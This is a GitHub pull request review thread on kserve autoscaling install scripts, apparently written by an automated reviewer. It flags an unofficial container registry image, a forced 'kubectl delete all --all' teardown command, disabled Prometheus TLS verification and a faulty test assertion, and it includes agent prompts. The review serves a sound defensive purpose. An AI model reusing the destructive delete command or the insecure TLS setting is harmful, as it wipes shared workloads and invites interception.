+          git merge --no-edit "origin/$BASE_REF"

Apply this to all three "Merge target branch" steps (lines 37–45, 72–80, 139–147).

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In @.github/workflows/e2e-test-quick-install.yaml around lines 37 - 45, In each
"Merge target branch" step, avoid direct event interpolation in the run block:
add an env entry (e.g., TARGET_REF: ${{ github.event.pull_request.base.ref }})
to the step and replace direct uses of ${{ github.event.pull_request.base.ref }}
in the run script with the shell-quoted variable "$TARGET_REF"; specifically
update the git fetch origin ... and git merge --no-edit origin/... commands in
the "Merge target branch" steps (also apply the same change to the other two
identical steps) so all event data comes from env and every shell use is
properly quoted.

name: mlpipeline-s3-artifact
key: secretkey
image: docker.io/chrislusf/seaweedfs:4.07@sha256:10fa7df90911dd83439f4d3d792a1c5c6c630121cb2094ba209f42d4b0ca975d
image: quay.io/flysangel/chrislusf/seaweedfs@sha256:a27e9c432f1dfaafb5bb3f5b39065c0df7a15423a3894025c714b3f06f998aeb
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🌐 Web query:

What is the official SeaweedFS container image repository (Docker Hub and Quay), maintained by the SeaweedFS project?

💡 Result:

The official SeaweedFS container image repository maintained by the SeaweedFS project is on Docker Hub at chrislusf/seaweedfs. There is no official Quay.io repository identified in the sources.

Citations:


Critical security issue: image sourced from unofficial registry introduces supply-chain compromise risk (CWE-829, CWE-345).

Exploit scenario: non-official Quay.io repositories bypass upstream provenance verification. Account takeover or registry misconfiguration allows attacker-controlled binaries to execute with cluster credentials and full network access.

Remediation (use official Docker Hub upstream)
-        image: quay.io/flysangel/chrislusf/seaweedfs@sha256:a27e9c432f1dfaafb5bb3f5b39065c0df7a15423a3894025c714b3f06f998aeb
+        image: docker.io/chrislusf/seaweedfs@sha256:a27e9c432f1dfaafb5bb3f5b39065c0df7a15423a3894025c714b3f06f998aeb

SeaweedFS maintains its official image on Docker Hub (chrislusf/seaweedfs), not Quay.io. Enforce signature verification and registry allowlists via Kyverno/Gatekeeper admission policies so digest pinning alone does not become a false sense of security.

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@config/overlays/test/s3-local-backend/seaweedfs-deployment.yaml` at line 34,
Replace the non-official image reference in the image: line
(quay.io/flysangel/chrislusf/seaweedfs@sha256:...) with the official SeaweedFS
image (chrislusf/seaweedfs) pinned to a verified digest or explicit trusted tag;
update the image source to Docker Hub (or your approved internal registry) and
ensure you verify signatures (not just digest) before deploying. Additionally,
add/enable admission controls (Kyverno or Gatekeeper) to enforce a registry
allowlist and image signature verification so future diffs cannot reintroduce
quay.io/flysangel/* images without policy approval.

Comment on lines +771 to +773
helm uninstall "${PROMETHEUS_RELEASE_NAME}" -n "${PROMETHEUS_NAMESPACE}" 2>/dev/null || true
kubectl delete all --all -n "${PROMETHEUS_NAMESPACE}" --force --grace-period=0 2>/dev/null || true
kubectl delete namespace "${PROMETHEUS_NAMESPACE}" --wait=true --timeout=60s --force --grace-period=0 2>/dev/null || true
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

kubectl delete all --all -n <ns> is a blast radius grenade.

Uninstall in uninstall_prometheus_helm, uninstall_keda_helm, and uninstall_wva_helm blindly wipes every all resource in monitoring / keda / wva-system. On a cluster where those namespaces are shared (monitoring is a very common shared namespace), unrelated tenants lose workloads with --force --grace-period=0. helm uninstall alone already removes chart-owned resources via owner refs; this line is unnecessary and actively dangerous.

Same pattern in all three uninstall functions.

🛠️ Proposed fix
     helm uninstall "${PROMETHEUS_RELEASE_NAME}" -n "${PROMETHEUS_NAMESPACE}" 2>/dev/null || true
-    kubectl delete all --all -n "${PROMETHEUS_NAMESPACE}" --force --grace-period=0 2>/dev/null || true
-    kubectl delete namespace "${PROMETHEUS_NAMESPACE}" --wait=true --timeout=60s --force --grace-period=0 2>/dev/null || true
+    # Namespace deletion is only safe for dedicated test namespaces; remove if sharing.
+    kubectl delete namespace "${PROMETHEUS_NAMESPACE}" --wait=true --timeout=60s 2>/dev/null || true

At minimum, gate the nuke behind an explicit flag (e.g. --purge-namespace) so a CI teardown can't strip a shared cluster.

Also applies to: 860-861, 903-905

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 771 - 773, The uninstall functions uninstall_prometheus_helm,
uninstall_keda_helm, and uninstall_wva_helm currently run "kubectl delete all
--all -n <namespace> --force --grace-period=0" which will indiscriminately
delete non-chart resources; remove these kubectl delete all calls or wrap them
behind an explicit opt-in flag (e.g. --purge-namespace) checked in the uninstall
functions so the default uninstall only uses helm uninstall (and optional
kubectl delete namespace if desired) and the destructive "delete all" is only
executed when the purge flag is provided.

Comment on lines +933 to +937
--set wva.prometheus.baseURL="${WVA_PROMETHEUS_URL}" \
--set wva.prometheus.tls.insecureSkipVerify=true \
--set wva.prometheus.serviceAccountName="prometheus-kube-prometheus-prometheus" \
--set wva.prometheus.monitoringNamespace="${PROMETHEUS_NAMESPACE:-monitoring}" \
--set wva.metrics.secure=false \
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🌐 Web query:

workload-variant-autoscaler helm chart prometheus tls caSecretName values

💡 Result:

Answer: The workload-variant-autoscaler Helm chart does not expose a value named prometheus.tls.caSecretName for configuring Prometheus TLS CA verification. Instead, it expects you to provide the Prometheus CA certificate via a file/inline value (caCert) which is then mounted/used by the controller, and it uses the env/config keys PROMETHEUS_CA_CERT_PATH (path) plus PROMETHEUS_TLS_INSECURE_SKIP_VERIFY (boolean) for TLS behavior. What to use instead (chart/repo-supported knobs): 1) In the WVA controller deployment, Prometheus TLS verification is configured via: - PROMETHEUS_BASE_URL (must be HTTPS in production) - PROMETHEUS_CA_CERT_PATH (path to the CA cert for TLS verification) - PROMETHEUS_TLS_INSECURE_SKIP_VERIFY (dev/test only) 2) In the Helm values, Prometheus TLS CA is provided as a certificate value/file (shown in the repo’s install/values guidance as a file upload flag; and in values snippets as wva.prometheus.caCert / tls.caCertPath). Practical implication: - If you were looking for a “caSecretName” pattern (like many charts use), it’s not present in this chart’s documented configuration. - You should configure CA verification by supplying the CA cert content/file so the chart can place it into the controller pod and set PROMETHEUS_CA_CERT_PATH accordingly. Example (from the repo’s documented Helm install flow): helm upgrade -i workload-variant-autoscaler ./charts/workload-variant-autoscaler \ --namespace workload-variant-autoscaler-system \ --set-file prometheus.caCert=/tmp/prometheus-ca.crt \ ... Evidence: - The Prometheus integration doc lists PROMETHEUS_CA_CERT_PATH and PROMETHEUS_TLS_INSECURE_SKIP_VERIFY as the TLS controls. - The install/README shows --set-file prometheus.caCert=... as the way to provide the CA cert. - A Helm values snippet in an issue shows the chart’s Prometheus TLS section uses tls.caCertPath (path) and caCert (content), not caSecretName.

Citations:


🏁 Script executed:

#!/bin/bash
# Search for WVA/workload-variant chart references and values files
fd -t f 'values.*\.ya?ml' | head -20

Repository: opendatahub-io/kserve

Length of output: 476


🏁 Script executed:

#!/bin/bash
# Search for Prometheus TLS config patterns in the installation script
rg 'prometheus.*tls|caSecretName|caCert|PROMETHEUS' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -A 2 -B 2

Repository: opendatahub-io/kserve

Length of output: 4156


🏁 Script executed:

#!/bin/bash
# Look for WVA chart documentation or references within the repo
fd -t f -i 'readme|doc.*prometheus|chart.*values' | grep -i wva

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Search for WVA-related chart files
fd -t f 'values.*\.ya?ml' charts/ | xargs grep -l 'prometheus\|wva' 2>/dev/null

Repository: opendatahub-io/kserve

Length of output: 49


🏁 Script executed:

#!/bin/bash
# Look for WVA chart directory
find charts/ -type d -iname '*wva*' -o -iname '*workload*' 2>/dev/null

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Search within the install script for WVA helm chart source/repo
rg 'helm.*repo|helm.*add|wva.*chart' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -B 2 -A 2

Repository: opendatahub-io/kserve

Length of output: 498


🏁 Script executed:

#!/bin/bash
# Find WVA helm repo source and install command in the script
rg 'helm.*install.*wva|helm.*add.*wva|llm-d-wva' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -B 5 -A 15

Repository: opendatahub-io/kserve

Length of output: 820


🏁 Script executed:

#!/bin/bash
# Get context around line 933 where the WVA settings are
sed -n '900,950p' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh

Repository: opendatahub-io/kserve

Length of output: 2101


🏁 Script executed:

#!/bin/bash
# Search for any WVA or llm-d documentation in the repo
rg -i 'llm-d|workload.*variant|wva' --type md hack/setup/

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Look for environment variable setup or certificate extraction logic
rg 'prometheus.*tls|caCert|PROMETHEUS_CA' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh -B 3 -A 3

Repository: opendatahub-io/kserve

Length of output: 1713


🏁 Script executed:

#!/bin/bash
# Check if there's a way to extract the prometheus-tls cert in the script
rg 'kubectl.*secret|kubectl.*get.*prometheus-tls' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

#!/bin/bash
# Check for any secret extraction or certificate handling in the script
rg 'kubectl.*extract|kubectl.*get.*secret|base64|tls.crt|ca.crt' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh | head -20

Repository: opendatahub-io/kserve

Length of output: 145


🏁 Script executed:

#!/bin/bash
# Look for any helm install patterns that use --set-file with secrets
rg '\-\-set-file|extract.*secret|ca.*crt' hack/setup/quick-install/ -r

Repository: opendatahub-io/kserve

Length of output: 479


🏁 Script executed:

#!/bin/bash
# Get full WVA install section to see all parameters
sed -n '925,950p' hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh

Repository: opendatahub-io/kserve

Length of output: 1167


insecureSkipVerify=true on Prometheus TLS config — CWE-295 (Improper Certificate Validation).

WVA connects to Prometheus over HTTPS (baseURL is https://...) but skips hostname/issuer verification, defeating the cert-manager-issued cert created above and enabling MITM on the Prometheus control-plane traffic (credential sniffing, metric spoofing that drives autoscaling decisions → replica flaps). Combined with wva.metrics.secure=false, the install posture is "TLS off by default".

The self-signed CA is already minted and stored in the prometheus-tls secret — mount it and verify instead. The WVA chart does not support caSecretName; use prometheus.caCert instead:

🛠️ Proposed direction

Extract the CA certificate from the prometheus-tls secret and pass it to WVA:

-        --set wva.prometheus.tls.insecureSkipVerify=true \
+        --set wva.prometheus.tls.insecureSkipVerify=false \
+        --set-file wva.prometheus.caCert=<(kubectl get secret prometheus-tls -n monitoring -o jsonpath='{.data.ca\.crt}' | base64 -d) \

Or inline the cert content directly if prometheus.caCert is the parameter. Verify against the WVA chart's values.yaml for exact parameter names (may be prometheus.caCert, prometheus.tls.caCert, or similar).

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
--set wva.prometheus.baseURL="${WVA_PROMETHEUS_URL}" \
--set wva.prometheus.tls.insecureSkipVerify=true \
--set wva.prometheus.serviceAccountName="prometheus-kube-prometheus-prometheus" \
--set wva.prometheus.monitoringNamespace="${PROMETHEUS_NAMESPACE:-monitoring}" \
--set wva.metrics.secure=false \
--set wva.prometheus.baseURL="${WVA_PROMETHEUS_URL}" \
--set wva.prometheus.tls.insecureSkipVerify=false \
--set-file wva.prometheus.caCert=<(kubectl get secret prometheus-tls -n monitoring -o jsonpath='{.data.ca\.crt}' | base64 -d) \
--set wva.prometheus.serviceAccountName="prometheus-kube-prometheus-prometheus" \
--set wva.prometheus.monitoringNamespace="${PROMETHEUS_NAMESPACE:-monitoring}" \
--set wva.metrics.secure=false \
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@hack/setup/quick-install/llmisvc-autoscaling-keda-dependency-install.sh`
around lines 933 - 937, The Helm install currently disables TLS verification
(wva.prometheus.tls.insecureSkipVerify=true) and sets wva.metrics.secure=false;
change this to enable verification by removing or setting
wva.prometheus.tls.insecureSkipVerify=false and enabling secure metrics, and
provide the Prometheus CA to the WVA chart using the chart's CA parameter (e.g.,
prometheus.caCert or wva.prometheus.caCert as defined in the chart values).
Extract the CA certificate stored in the prometheus-tls secret and pass its PEM
content to the Helm command's caCert parameter (or update the values file) so
WVA validates Prometheus' server cert instead of skipping verification; ensure
references to the prometheus-tls secret and the chart parameter names
(prometheus-tls, wva.prometheus.tls.insecureSkipVerify, wva.metrics.secure,
prometheus.caCert / wva.prometheus.caCert) are used to locate the change.

Comment on lines +1571 to +1578
// Verify no scheduler deployment was created for the AMD instance
amdScheduler := &appsv1.Deployment{}
err = envTest.Get(ctx, client.ObjectKey{
Name: amdSvcName + "-kserve-epp",
Namespace: testNs.Name,
}, amdScheduler)
Expect(errors.IsNotFound(err)).To(BeTrue(),
"AMD instance should not create a scheduler deployment")
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

Check the real scheduler Deployment name in this negative assertion.

The rest of this file resolves scheduler Deployments as -kserve-router-scheduler, but this test looks up -kserve-epp. That makes the assertion pass even if the AMD service actually creates a scheduler Deployment, so the regression check is ineffective.

🐛 Proposed fix
 			amdScheduler := &appsv1.Deployment{}
 			err = envTest.Get(ctx, client.ObjectKey{
-				Name:      amdSvcName + "-kserve-epp",
+				Name:      amdSvcName + "-kserve-router-scheduler",
 				Namespace: testNs.Name,
 			}, amdScheduler)
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
// Verify no scheduler deployment was created for the AMD instance
amdScheduler := &appsv1.Deployment{}
err = envTest.Get(ctx, client.ObjectKey{
Name: amdSvcName + "-kserve-epp",
Namespace: testNs.Name,
}, amdScheduler)
Expect(errors.IsNotFound(err)).To(BeTrue(),
"AMD instance should not create a scheduler deployment")
// Verify no scheduler deployment was created for the AMD instance
amdScheduler := &appsv1.Deployment{}
err = envTest.Get(ctx, client.ObjectKey{
Name: amdSvcName + "-kserve-router-scheduler",
Namespace: testNs.Name,
}, amdScheduler)
Expect(errors.IsNotFound(err)).To(BeTrue(),
"AMD instance should not create a scheduler deployment")
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/controller_int_scheduler_config_test.go`
around lines 1571 - 1578, The test's negative assertion checks the wrong
Deployment name: it looks up amdSvcName + "-kserve-epp" but all other tests
expect scheduler Deployments named amdSvcName + "-kserve-router-scheduler", so
the check can pass incorrectly; update the Get() call in the test to use
amdSvcName + "-kserve-router-scheduler" (the same scheduler name used elsewhere)
and keep the Expect(errors.IsNotFound(err)).To(BeTrue()) assertion to ensure no
scheduler Deployment was created for the AMD instance.

Comment on lines +1111 to +1122
func schedulerTransform(ctx context.Context, d *appsv1.Deployment) error {
version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
if !ok || version == "" {
version = "0.0.0"
}
v, err := semver.NewVersion(version)
if err != nil {
return fmt.Errorf("failed to parse version %q: %w", version, err)
}
if v.Compare(*semver.New("0.7.0")) < 0 {
return nil
}
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

⚠️ Potential issue | 🟠 Major

🧩 Analysis chain

🌐 Web query:

github.com/coreos/go-semver NewVersion behavior with leading "v" prefix and non-strict versions

💡 Result:

The github.com/coreos/go-semver package provides semver.NewVersion(version string) (*Version, error), which parses the input string via the Version.Set method. This splits off metadata (+), prerelease (-), and then splits the core version into major.minor.patch using strings.SplitN(version, ".", 3). It validates each numeric part as int64 and identifiers with validateIdentifier. For leading "v" prefix: No explicit stripping or handling of a leading "v" is mentioned in available source snippets. Since examples use semver.New("1.2.3") without "v" and parsing starts directly on the version string expecting numeric parts after splitting, a leading "v" like "v1.2.3" will cause SplitN to produce ["v1","2","3"], failing numeric parsing for major (cannot parse "v1" as int64). Thus, NewVersion("v1.2.3") returns an error. Users should strip the "v" prefix manually before passing to NewVersion if present. For non-strict versions: The library enforces semver rules strictly. Numeric parts must parse to int64 without leading zeros (likely via validateIdentifier checking no leading zeros), identifiers limited to [0-9A-Za-z-], no empty parts. Invalid formats like "1.2" (missing patch), leading zeros "01.2.3", or invalid chars fail with errors like "invalid dotted-tri format" or validation errors. It does not coerce incomplete versions to ".0"; requires full major.minor.patch.

Citations:


🏁 Script executed:

# Find the scheduler.go file and examine the function call chain
fd "scheduler.go" -t f | head -5

Repository: opendatahub-io/kserve

Length of output: 110


🏁 Script executed:

# Search for expectedSchedulerDeployment and its calls to schedulerTransform
rg "expectedSchedulerDeployment|reconcileSchedulerDeployment" --type go -A 3 -B 1

Repository: opendatahub-io/kserve

Length of output: 1470


🏁 Script executed:

# Verify the call chain by looking for where schedulerTransform is called
rg "schedulerTransform" --type go -B 2 -A 2

Repository: opendatahub-io/kserve

Length of output: 2797


🏁 Script executed:

# Examine the scheduler_test.go file around schedulerTransform tests
rg "schedulerTransform" -A 15 -B 5 pkg/controller/v1alpha2/llmisvc/scheduler_test.go | head -80

Repository: opendatahub-io/kserve

Length of output: 1545


🏁 Script executed:

# Look for test cases with version annotations to understand expected behavior
rg "app.kubernetes.io/version" --type go -B 3 -A 3

Repository: opendatahub-io/kserve

Length of output: 3085


🏁 Script executed:

# Find all version test cases in the scheduler_test.go
rg "version.*=" pkg/controller/v1alpha2/llmisvc/scheduler_test.go | grep -E "version\s*:" | head -30

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

# Look at TestSchedulerTransformThreshold test structure to see version values
sed -n '/func TestSchedulerTransformThreshold/,/^func /p' pkg/controller/v1alpha2/llmisvc/scheduler_test.go | head -100

Repository: opendatahub-io/kserve

Length of output: 3506


🏁 Script executed:

# Check if there are any tests with malformed versions or error cases
rg "TestSchedulerTransform|malformed|invalid|error" pkg/controller/v1alpha2/llmisvc/scheduler_test.go | head -20

Repository: opendatahub-io/kserve

Length of output: 162


🏁 Script executed:

# Look more carefully at all test cases to see if any test invalid versions
sed -n '/version.*:/,/validateConfig/p' pkg/controller/v1alpha2/llmisvc/scheduler_test.go | grep -E 'version|name:' | head -40

Repository: opendatahub-io/kserve

Length of output: 434


🏁 Script executed:

# Check for any test with version like "v0.7.0" or malformed versions
rg '"v[0-9]|malformed|invalid' pkg/controller/v1alpha2/llmisvc/scheduler_test.go

Repository: opendatahub-io/kserve

Length of output: 47


🏁 Script executed:

# Look for all test cases to see the full range of tested versions
sed -n '/tests := \[\]/,/for _, tt := range tests/p' pkg/controller/v1alpha2/llmisvc/scheduler_test.go | grep -E 'name:|version:' | head -50

Repository: opendatahub-io/kserve

Length of output: 2619


🏁 Script executed:

# Check if there's admission control or validation webhook for this annotation
fd "admission|webhook|validat" --type f | grep -i "llm\|scheduler"

Repository: opendatahub-io/kserve

Length of output: 972


🏁 Script executed:

# Search for any version validation or admission webhook in the controller
rg "ValidatingWebhook|app.kubernetes.io/version" --type go -B 3 -A 3 | head -40

Repository: opendatahub-io/kserve

Length of output: 3085


🏁 Script executed:

# Let's see how the version annotation might be set - check user-facing docs or examples
fd "README|example|sample" -t f | xargs grep -l "app.kubernetes.io/version" 2>/dev/null

Repository: opendatahub-io/kserve

Length of output: 49


🏁 Script executed:

# Check if the annotation is set anywhere in the codebase - look for where it's created
rg "app.kubernetes.io/version" --type go | grep -v "test\|//"

Repository: opendatahub-io/kserve

Length of output: 183


🏁 Script executed:

# Examine the validation webhooks to see if they validate pod annotations
head -100 pkg/apis/serving/v1alpha2/llm_inference_service_validation.go

Repository: opendatahub-io/kserve

Length of output: 3644


🏁 Script executed:

# Check if scheduler.go is actually in a controller package to verify it's part of reconciliation
head -50 pkg/controller/v1alpha2/llmisvc/scheduler.go

Repository: opendatahub-io/kserve

Length of output: 1581


🏁 Script executed:

# Verify that the annotation is actually user-provided by checking if Deployment is created from LLMInferenceService spec
rg "LLMInferenceService" pkg/controller/v1alpha2/llmisvc/scheduler.go | head -5

Repository: opendatahub-io/kserve

Length of output: 738


Malformed app.kubernetes.io/version annotation blocks scheduler reconciliation.

semver.NewVersion from github.com/coreos/go-semver is strict: a leading v (e.g., v0.7.0), missing patch component (0.7), or any non-SemVer2 format returns an error. This error propagates through expectedSchedulerDeploymentreconcileSchedulerDeployment and blocks all subsequent reconciliation attempts until the annotation is manually corrected. A typo or common format variation (e.g., pasting a release tag with v prefix) becomes a permanent outage for the scheduler.

Trim the leading v, default to 0.0.0 on parse error with logging, or reject invalid annotations at admission time rather than at reconcile time.

Suggested fix
 	version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
 	if !ok || version == "" {
 		version = "0.0.0"
 	}
-	v, err := semver.NewVersion(version)
+	v, err := semver.NewVersion(strings.TrimPrefix(version, "v"))
 	if err != nil {
-		return fmt.Errorf("failed to parse version %q: %w", version, err)
+		log.FromContext(ctx).Info("Unparseable app.kubernetes.io/version, skipping v0.7 scheduler migrations", "version", version, "error", err.Error())
+		return nil
 	}
 	if v.Compare(*semver.New("0.7.0")) < 0 {
 		return nil
 	}
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
func schedulerTransform(ctx context.Context, d *appsv1.Deployment) error {
version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
if !ok || version == "" {
version = "0.0.0"
}
v, err := semver.NewVersion(version)
if err != nil {
return fmt.Errorf("failed to parse version %q: %w", version, err)
}
if v.Compare(*semver.New("0.7.0")) < 0 {
return nil
}
func schedulerTransform(ctx context.Context, d *appsv1.Deployment) error {
version, ok := d.Spec.Template.Annotations["app.kubernetes.io/version"]
if !ok || version == "" {
version = "0.0.0"
}
v, err := semver.NewVersion(strings.TrimPrefix(version, "v"))
if err != nil {
log.FromContext(ctx).Info("Unparseable app.kubernetes.io/version, skipping v0.7 scheduler migrations", "version", version, "error", err.Error())
return nil
}
if v.Compare(*semver.New("0.7.0")) < 0 {
return nil
}
🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@pkg/controller/v1alpha2/llmisvc/scheduler.go` around lines 1111 - 1122,
schedulerTransform currently fails reconciliation when the
app.kubernetes.io/version annotation is non-strict SemVer; instead, sanitize and
tolerate common formats: in schedulerTransform trim a leading "v" (and
whitespace) from d.Spec.Template.Annotations["app.kubernetes.io/version"] before
calling semver.NewVersion, and if semver.NewVersion still returns an error, log
the parse failure and set version to "0.0.0" (do not return the error) so
expectedSchedulerDeployment/reconcileSchedulerDeployment continue reconciling;
ensure log messages include the raw annotation and the fallback decision for
debugging.

Comment on lines +110 to +121
if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh

elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
fi
Copy link
Copy Markdown

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

🛠️ Refactor suggestion | 🟠 Major

Quote ${REPO_ROOT} expansions in the new autoscaler invocations.

Shellcheck SC2086 flags lines 112–114 and 118–120. If REPO_ROOT ever resolves to a path with whitespace or glob metachars, word splitting will break the invocation. As per coding guidelines (**/*.sh: "Quote all variables to prevent injection").

🔧 Proposed fix
   if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
     echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
-    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
+    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"

   elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
     echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
-    ${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh
-    ${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
+    "${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh"
+    "${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"
   fi
📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change
if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh
${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh
fi
if [[ $LLMISVC_AUTOSCALER == "hpa" ]]; then
echo "Installing LLMISVC HPA autoscaling components (Prometheus, Prometheus Adapter, WVA)..."
"${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
"${REPO_ROOT}/hack/setup/infra/manage.prometheus-adapter-helm.sh"
"${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"
elif [[ $LLMISVC_AUTOSCALER == "keda" ]]; then
echo "Installing LLMISVC KEDA autoscaling components (Prometheus, KEDA, WVA)..."
"${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh"
"${REPO_ROOT}/hack/setup/infra/manage.keda-helm.sh"
"${REPO_ROOT}/hack/setup/infra/manage.wva-helm.sh"
fi
🧰 Tools
🪛 Shellcheck (0.11.0)

[info] 112-112: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 113-113: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 114-114: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 118-118: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 119-119: Double quote to prevent globbing and word splitting.

(SC2086)


[info] 120-120: Double quote to prevent globbing and word splitting.

(SC2086)

🤖 Prompt for AI Agents
Verify each finding against the current code and only fix it if needed.

In `@test/scripts/gh-actions/setup-deps.sh` around lines 110 - 121, The shell
invocations using ${REPO_ROOT} (e.g., calls to manage.prometheus-helm.sh,
manage.prometheus-adapter-helm.sh, manage.wva-helm.sh, and manage.keda-helm.sh)
are unquoted and trigger ShellCheck SC2086; update each invocation to quote the
variable so the commands use
"${REPO_ROOT}/hack/setup/infra/manage.prometheus-helm.sh" (and likewise for
manage.prometheus-adapter-helm.sh, manage.wva-helm.sh, manage.keda-helm.sh) to
prevent word-splitting or glob expansion if REPO_ROOT contains spaces or
metacharacters.

@rhods-ci-bot
Copy link
Copy Markdown

@vivekk16: The following test has Failed:

OCI Artifact Browser URL

View in Artifact Browser

Inspecting Test Artifacts Manually

To inspect your test artifacts manually, follow these steps:

  1. Install ORAS (see the ORAS installation guide).
  2. Download artifacts with the following commands:
mkdir -p oras-artifacts
cd oras-artifacts
oras pull quay.io/opendatahub/odh-ci-artifacts:kserve-group-test-9rr7z

@openshift-ci
Copy link
Copy Markdown

openshift-ci Bot commented Apr 24, 2026

@vivekk16: The following test failed, say /retest to rerun all failed tests or /retest-required to rerun all mandatory failed tests:

Test name Commit Details Required Rerun command
ci/prow/e2e-llm-inference-service e094d85 link true /test e2e-llm-inference-service

Full PR test history. Your PR dashboard.

Details

Instructions for interacting with me using PR comments are available here. If you have questions or suggestions related to my behavior, please file an issue against the kubernetes-sigs/prow repository. I understand the commands that are listed here.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Labels

Projects

Status: New/Backlog

Development

Successfully merging this pull request may close these issues.

6 participants